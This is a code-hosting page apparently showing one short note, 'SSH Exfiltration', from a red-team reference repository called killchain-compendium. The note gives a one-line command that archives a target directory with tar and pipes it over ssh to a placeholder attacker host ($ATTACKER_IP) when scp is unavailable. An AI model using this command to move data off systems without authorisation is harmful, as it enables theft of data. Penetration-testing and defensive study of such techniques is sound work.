This website requires JavaScript.
Explore
Help
Sign In
whx
/
killchain-compendium
Watch
1
Star
0
Fork
You've already forked killchain-compendium
0
Code
Issues
Pull Requests
Projects
Releases
Wiki
Activity
edd1c69e13
killchain-compendium
/
Exfiltration
/
SSH.md
229 B
Raw
Blame
History
SSH Exfiltration
Given: without
scp
Compress
Archive the data on target, send it to the attacker. Unpack including preserved permissions
tar cf - <directory>
|
ssh user@
$ATTACKER_IP
"cd /tmp/; tar xpf -"